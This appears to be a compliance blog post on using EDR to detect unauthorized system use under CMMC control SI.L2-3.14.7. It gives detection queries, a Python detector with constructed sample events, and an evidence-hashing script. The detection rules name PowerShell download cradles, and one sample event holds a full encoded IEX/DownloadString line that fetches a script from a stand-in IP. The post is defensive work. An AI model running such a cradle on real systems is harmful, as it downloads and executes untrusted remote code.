How to Use Endpoint Detection and Response (EDR) to Identify Unauthorized Use of Organizational Systems with Example Queries — NIST SP 800-171 REV.2 / CMMC 2.0 Level 2 - Control - SI.L2-3.14.7

Learn how to configure and use Endpoint Detection and Response (EDR) to detect unauthorized use of organizational systems with practical queries, playbooks, and compliance guidance for NIST SP 800-171 Rev.2 / CMMC 2.0 Level 2.

April 09, 2026
5 min read


Endpoint Detection and Response (EDR) is the most practical way for most organizations to satisfy SI.L2-3.14.7 under NIST SP 800-171 Rev.2 / CMMC 2.0 Level 2. The control itself requires that you identify unauthorized use of organizational systems; it does not mandate a specific product, but an assessor will expect to see monitoring that can actually surface such use and evidence that it is reviewed. This post explains how to instrument EDR, the telemetry to collect, sample detection queries you can start using today, and how a small business can meet the control with realistic operational steps.

What the control means and implementation overview

The requirement text is short: "Identify unauthorized use of organizational systems." In practice SI.L2-3.14.7 expects organizations to actively use endpoint monitoring tools to detect unauthorized use of systems. This includes access by unauthorized users, execution of unauthorized software, and remote access or command-and-control activity that indicates a system is being used outside defined policy. For implementation: deploy an EDR agent to every in-scope endpoint (servers and administrative workstations included), integrate the EDR with centralized logging/alerting (SIEM or cloud-native analytics), maintain an authoritative asset inventory, and document allowed software and administrative accounts (an allowlist) so the EDR can distinguish authorized from unauthorized behavior. Without that allowlist, "unauthorized" has no operational definition and the tool cannot tell you anything useful.

Telemetry and technical details to collect

To effectively detect unauthorized use, ensure your EDR collects at minimum: process creation events (with full command line), parent process, file hash (SHA256), user and account context, network connections (local and remote IP/port, direction), service and driver installations, new user account creation, modifications to authentication/authorization artifacts, and removable-media attachments. Capture timestamps in UTC, and retain raw event data for at least the minimum period your compliance posture requires (commonly 90 days for detection and 1 year for investigations, depending on contract). Also forward privileged authentication logs (Active Directory / Azure AD, now Entra ID), VPN, and remote access logs to the same analytics platform so they can be correlated with endpoint events; a remote-tool launch is far more meaningful when you can see the VPN session or interactive logon that preceded it.

Example detection queries (actionable, vendor-specific examples)

Below are ready-to-use example queries for common EDR platforms (Microsoft Defender for Endpoint advanced hunting in KQL, Elastic EQL and Kibana KQL) and osquery that detect unauthorized or anomalous use. Replace placeholders (like IP ranges, allowed tool lists, and admin accounts) with your environment specifics and tune thresholds to reduce false positives.


// 1) Suspicious PowerShell with encoded commands or download cradles (Microsoft Defender for Endpoint, KQL)
//    "in~" is case-insensitive and also catches PowerShell 7 (pwsh.exe); has_any matches whole terms, so list both
//    the short "-enc" and the full "-encodedcommand" switch. SHA256 is the process-file hash column in this table.
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand", "IEX", "Invoke-Expression", "DownloadString", "DownloadFile")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA256

// 2) Inbound RDP accepted from outside your internal ranges (Microsoft Defender for Endpoint, KQL)
//    Add your own internal ranges. If RDP is only reachable through a VPN or gateway, RemoteIP will be the gateway
//    address, so correlate with the VPN logs rather than expecting a public source here.
DeviceNetworkEvents
| where ActionType == "InboundConnectionAccepted" and LocalPort == 3389
| where not(ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16"))
| summarize Connections = count() by RemoteIP, DeviceName, bin(Timestamp, 1h)

// 3) Process launch of unapproved remote-access tools (Elastic EQL; ":" is case-insensitive)
//    Extend the list with any tool that is not on your approved-software inventory. EQL returns whole events;
//    pivot on @timestamp, host.name, user.name, process.command_line and process.parent.name during triage.
process where event.type == "start" and
  process.name : ("TeamViewer.exe", "AnyDesk.exe", "splashtop.exe", "logmein.exe")

// 4) New user account created (Windows Security Event 4720; Kibana KQL over Elastic Agent / Winlogbeat data)
//    Elastic maps 4720 to event.category "iam", not "authentication". winlog.event_data.SubjectUserName is the
//    account that created the user; winlog.event_data.TargetUserName is the new account. Alert when the subject
//    is not on your approved admin list.
event.category: "iam" and event.code: "4720"

-- 5) Local user accounts (osquery). The users table carries no creation time, so schedule this query and alert on
--    the "added" rows from osquery's differential logging, which reports accounts that appeared since the last run.
SELECT uid, gid, username, description, directory, shell FROM users;

-- 6) Removable USB devices currently attached (osquery). usb_devices has no timestamp columns either; schedule it
--    and treat differential "added" rows as "attached since the previous run" for removable-media auditing.
SELECT vendor, vendor_id, model, model_id, serial, removable FROM usb_devices WHERE removable = 1;

Use these queries as detection templates: add allowlists such as approved admin usernames, IP ranges for legitimate remote access providers, and an approved software inventory. Configure alerting for high-confidence matches and set lower-severity findings to a continuous tuning workflow.
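The allowlist-driven tuning described above, shown as an added example that is not code from the original post: a small Python detector that applies the same checks as the queries (suspicious PowerShell, unapproved remote-access tools, inbound RDP from outside the internal ranges, account creation by someone who is not an approved admin) to constructed endpoint events, so rules and allowlists can be tested offline before they go into the EDR console. The flat event shape, the internal ranges, the admin account and the hypothetical approved tool (Splashtop here) are assumptions to replace with your own values. It also decodes -EncodedCommand payloads so the analyst sees the real command, which the hunting query alone does not show.

```python
"""Offline check of unauthorized-use rules against constructed endpoint events.

Added example, not code from the original post. The flat event dict shape and the
allowlists below are assumptions; replace them with your environment's values.
"""
from __future__ import annotations

import base64
import ipaddress
import re
from dataclasses import dataclass

# Environment-specific allowlists (assumed values; replace with yours).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
REMOTE_ACCESS_TOOLS = {"teamviewer.exe", "anydesk.exe", "splashtop.exe", "logmein.exe"}
APPROVED_REMOTE_TOOLS = {"splashtop.exe"}      # hypothetical: the org standardised on Splashtop
APPROVED_ADMINS = {"corp\\it-admin"}           # hypothetical approved admin account

# Whole-token match for -e / -ec / -enc / -EncodedCommand plus common download cradles.
SUSPICIOUS_PS = re.compile(
    r"(?:^|\s)-e(?:nc|ncodedcommand|c)?(?=\s)|\b(?:iex|invoke-expression|downloadstring|downloadfile)\b",
    re.I)
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    rule: str
    severity: str
    host: str
    detail: str


def is_external(ip: str) -> bool:
    """True when the address is outside every configured internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def decode_encoded_command(cmdline: str) -> str | None:
    """-EncodedCommand takes base64 of UTF-16LE text; return the plaintext when present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process(ev: dict) -> list[Finding]:
    name = ev["process_name"].lower()
    cmd = ev.get("command_line", "")
    user = ev.get("user", "").lower()
    out: list[Finding] = []
    if name in ("powershell.exe", "pwsh.exe") and SUSPICIOUS_PS.search(cmd):
        decoded = decode_encoded_command(cmd)
        detail = f"decoded payload: {decoded}" if decoded else f"command line: {cmd}"
        out.append(Finding("suspicious_powershell", "high", ev["host"], detail))
    if name in REMOTE_ACCESS_TOOLS and name not in APPROVED_REMOTE_TOOLS:
        # An approved admin running an unapproved tool is still a policy violation, just lower urgency.
        sev = "medium" if user in APPROVED_ADMINS else "high"
        out.append(Finding("unapproved_remote_tool", sev, ev["host"], f"{name} run by {user}"))
    return out


def check_network(ev: dict) -> list[Finding]:
    if ev.get("direction") == "inbound" and ev.get("local_port") == 3389 and is_external(ev["remote_ip"]):
        return [Finding("external_rdp", "high", ev["host"], f"RDP accepted from {ev['remote_ip']}")]
    return []


def check_account(ev: dict) -> list[Finding]:
    # Windows Security Event 4720: a user account was created.
    if ev.get("event_code") == 4720 and ev.get("actor", "").lower() not in APPROVED_ADMINS:
        return [Finding("unauthorized_account_creation", "high", ev["host"],
                        f"{ev['actor']} created {ev['new_account']}")]
    return []


def run_detections(events: list[dict]) -> list[Finding]:
    dispatch = {"process": check_process, "network": check_network, "account": check_account}
    findings: list[Finding] = []
    for ev in events:
        findings.extend(dispatch[ev["type"]](ev))
    return findings


# Constructed sample events (not real telemetry); the encoded command is built here so it stays readable.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "host": "ENG-03", "user": "corp\\jsmith", "process_name": "powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {_ENCODED}"},
    {"type": "process", "host": "ENG-03", "user": "corp\\jsmith", "process_name": "powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},  # benign
    {"type": "process", "host": "ENG-07", "user": "corp\\jsmith", "process_name": "AnyDesk.exe",
     "command_line": "AnyDesk.exe"},
    {"type": "process", "host": "ENG-07", "user": "corp\\it-admin", "process_name": "TeamViewer.exe",
     "command_line": "TeamViewer.exe"},
    {"type": "process", "host": "ENG-09", "user": "corp\\it-admin", "process_name": "Splashtop.exe",
     "command_line": "Splashtop.exe"},  # allowlisted
    {"type": "network", "host": "ENG-07", "direction": "inbound", "local_port": 3389, "remote_ip": "203.0.113.45"},
    {"type": "network", "host": "ENG-07", "direction": "inbound", "local_port": 3389, "remote_ip": "10.20.30.40"},
    {"type": "account", "host": "DC-01", "event_code": 4720, "actor": "corp\\jsmith", "new_account": "svc_backup2"},
    {"type": "account", "host": "DC-01", "event_code": 4720, "actor": "corp\\it-admin", "new_account": "contractor.a"},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule} on {f.host}: {f.detail}")
```

Run it against the constructed events and five findings come back: the encoded PowerShell (with the cradle decoded), AnyDesk run by a regular user (high), TeamViewer run by the approved admin (medium, a policy violation rather than an intrusion), the RDP session from 203.0.113.45, and the account created by a non-admin. The benign PowerShell script, the Splashtop launch and the internal RDP session produce nothing, which is the behaviour the allowlists are there to guarantee. The same structure works as a regression test: keep a file of events that must and must not fire and re-run it whenever an allowlist or threshold changes.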

Real-world small-business scenarios and application

Scenario A: a small engineering shop with 40 endpoints. An employee installs an unmanaged remote-access tool to let a contractor troubleshoot. Detection: the EDR query for unapproved remote-access tools triggers. Remediation: IT isolates the endpoint, removes the tool, and reviews network sessions for data exfiltration.

Scenario B: a healthcare subcontractor that handles CUI. An intern uses personal cloud-sync software to move files to a personal account. Detection: the EDR flags the process creation together with the network connection to the cloud storage provider. Response: suspend the account, preserve endpoint artifacts, and perform a forensic review.

Both scenarios show how EDR detects unauthorized use that policy alone won't prevent.

Operational playbook: triage, response, and evidence preservation

When an EDR alert indicates unauthorized use, follow a documented playbook: (1) Triage — validate the alert, check the asset owner and allowlists; (2) Contain — isolate the device from the network, and block the remote IP or file hash where appropriate; (3) Collect — take EDR snapshots, get process trees, and capture memory images if needed, before remediation destroys the evidence; (4) Remediate — remove unauthorized software, rotate credentials if compromised, and patch the vulnerabilities used for access; (5) Recover and review — restore services from known-good images and update policy and detection rules. Record all steps, with timestamps and who performed them, in your incident log to support compliance evidence for audits under NIST/CMMC.
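The Collect step above, as an added example that is not part of the original post: a Python script that hashes every artifact in an evidence folder, records who collected it, from which host, for which alert and when (UTC), and seals the manifest with its own SHA-256 so that any later edit to an artifact or to the manifest itself is detectable at review time. The folder layout, alert ID and collector name are assumptions, and the sample artifacts written in demo() are constructed stand-ins for EDR process-tree and connection exports.

```python
"""Evidence bundle manifest for the Collect step: hash, attribute, and seal.

Added example, not code from the original post. The folder layout, alert ID and
collector name are assumptions; the artifacts written in demo() are constructed.
"""
from __future__ import annotations

import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

MANIFEST_NAME = "manifest.json"


def sha256_file(path: Path) -> str:
    """Stream the file so large memory images do not have to fit in RAM."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def _canonical(doc: dict) -> bytes:
    """Deterministic JSON so the seal is reproducible regardless of key order."""
    return json.dumps(doc, sort_keys=True, separators=(",", ":")).encode()


def build_manifest(evidence_dir: Path, alert_id: str, collector: str, host: str) -> dict:
    artifacts = [
        {"path": p.relative_to(evidence_dir).as_posix(), "size": p.stat().st_size, "sha256": sha256_file(p)}
        for p in sorted(evidence_dir.rglob("*"))
        if p.is_file() and p.name != MANIFEST_NAME
    ]
    manifest = {
        "alert_id": alert_id,
        "host": host,
        "collector": collector,
        "collected_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "artifacts": artifacts,
    }
    # The seal covers everything above; copy it into the incident log so the bundle can be matched later.
    manifest["manifest_sha256"] = hashlib.sha256(_canonical(manifest)).hexdigest()
    return manifest


def write_manifest(evidence_dir: Path, manifest: dict) -> Path:
    out = evidence_dir / MANIFEST_NAME
    out.write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return out


def verify_bundle(evidence_dir: Path) -> tuple[bool, list[str]]:
    """Re-hash everything; report a seal mismatch, missing files, and changed files."""
    manifest = json.loads((evidence_dir / MANIFEST_NAME).read_text())
    problems: list[str] = []
    seal = manifest.pop("manifest_sha256", None)
    if hashlib.sha256(_canonical(manifest)).hexdigest() != seal:
        problems.append("manifest seal mismatch: manifest was edited after sealing")
    for art in manifest["artifacts"]:
        p = evidence_dir / art["path"]
        if not p.is_file():
            problems.append(f"missing artifact: {art['path']}")
        elif sha256_file(p) != art["sha256"]:
            problems.append(f"hash mismatch: {art['path']}")
    return (not problems, problems)


def demo() -> dict:
    """Build a bundle from constructed artifacts, verify it, then tamper with one file and re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        ev = Path(tmp)
        # Constructed sample artifacts standing in for EDR process-tree and connection exports.
        (ev / "process_tree.txt").write_text("explorer.exe (1234)\n  AnyDesk.exe (5678) user=corp\\jsmith\n")
        (ev / "netstat.txt").write_text("TCP 10.0.5.7:52112 203.0.113.45:443 ESTABLISHED 5678\n")
        manifest = build_manifest(ev, alert_id="ALERT-0042", collector="analyst1", host="ENG-07")
        write_manifest(ev, manifest)
        ok_before, _ = verify_bundle(ev)
        (ev / "netstat.txt").write_text("TCP 10.0.5.7:52112 10.0.0.9:443 ESTABLISHED 5678\n")  # tamper
        ok_after, problems = verify_bundle(ev)
    return {"artifacts": len(manifest["artifacts"]), "seal": manifest["manifest_sha256"],
            "ok_before": ok_before, "ok_after": ok_after, "problems": problems}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The seal only proves that nothing changed after collection; it does not prove who collected it. Record the manifest hash in the incident ticket at collection time (a system the collector cannot silently edit), and the ticket plus the bundle together give an assessor a verifiable chain from alert to evidence.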

Compliance tips, tuning, and best practices

Practical tips: (1) Start with a baseline period (30 days) to establish normal behavior and reduce false positives; (2) Maintain an allowlist of approved admin accounts, remote management tools, and trusted IP ranges; (3) Ensure role-based access to EDR consoles and audit changes to detection rules; (4) Automate evidence collection for high-severity alerts to preserve chain of custody; (5) Document policies — e.g., acceptable remote access tools and removable media rules — and map detected events to policy violations for corrective action. Also ensure log retention meets contractual and regulatory requirements and include EDR evidence in your System Security Plan (SSP) and Plan of Action & Milestones (POA&M) when required by NIST SP 800-171.

Risk of not implementing effective EDR detections

Without EDR tuned to identify unauthorized use, small organizations face increased risk of credential theft, lateral movement, data exfiltration of CUI, contract loss, and regulatory penalties. Many breaches begin with seemingly legitimate user actions (installing remote tools, enabling file sync) — without detection, these escalate unnoticed. Additionally, failure to demonstrate monitoring and detection capabilities can result in non-compliance findings in NIST SP 800-171/CMMC assessments and loss of government contracts.

Summary: Deploy an EDR with comprehensive process, network, and user telemetry, integrate it with centralized analytics, and use targeted detection queries (examples above) to spot unauthorized use. For small businesses, focus first on high-risk detections (remote access, suspicious command execution, new user creation, removable-media transfers), document your playbook and rules, and continuously tune allowlists and thresholds to balance detection coverage with operational noise — these steps will help you meet SI.L2-3.14.7 and reduce real-world risk.
